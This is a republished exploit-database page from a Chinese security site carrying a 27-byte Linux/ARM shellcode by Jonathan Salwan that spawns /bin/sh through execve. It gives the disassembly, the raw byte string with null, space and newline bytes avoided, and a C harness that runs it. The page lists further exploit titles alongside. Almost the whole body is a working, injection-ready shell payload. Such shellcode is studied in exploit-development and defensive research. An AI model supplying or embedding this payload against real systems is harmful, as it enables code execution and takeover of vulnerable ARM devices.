Linux/ARM - execve("/bin/sh", [0], [0 vars])

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes

来源：shell-storm.org 作者：Salwan 发布时间：2010-09-06

/*
Title:     Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
Date:      2010-08-31
Tested on: ARM926EJ-S rev 5 (v5l)
Author:    Jonathan Salwan - twitter: @shell_storm

shell-storm.org

Shellcode ARM with not a 0x20, 0x0a and 0x00

Disassembly of section .text:

00008054 <_start>:
    8054: e28f3001 add r3, pc, #1 ; 0x1
    8058: e12fff13 bx r3
    805c: 4678      mov r0, pc
    805e: 3008      adds r0, #8
    8060: 1a49      subs r1, r1, r1
    8062: 1a92      subs r2, r2, r2
    8064: 270b      movs r7, #11
    8066: df01      svc 1
    8068: 622f      str r7, [r5, #32]
    806a: 6e69      ldr r1, [r5, #100]
    806c: 732f      strb r7, [r5, #12]
    806e: 0068      lsls r0, r5, #1

#include <stdio.h>

char SC[] = "\x01\x30\x8f\xe2"
            "\x13\xff\x2f\xe1"
            "\x78\x46\x08\x30"
            "\x49\x1a\x92\x1a"
            "\x0b\x27\x01\xdf"
            "\x2f\x62\x69\x6e"
            "\x2f\x73\x68";

int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告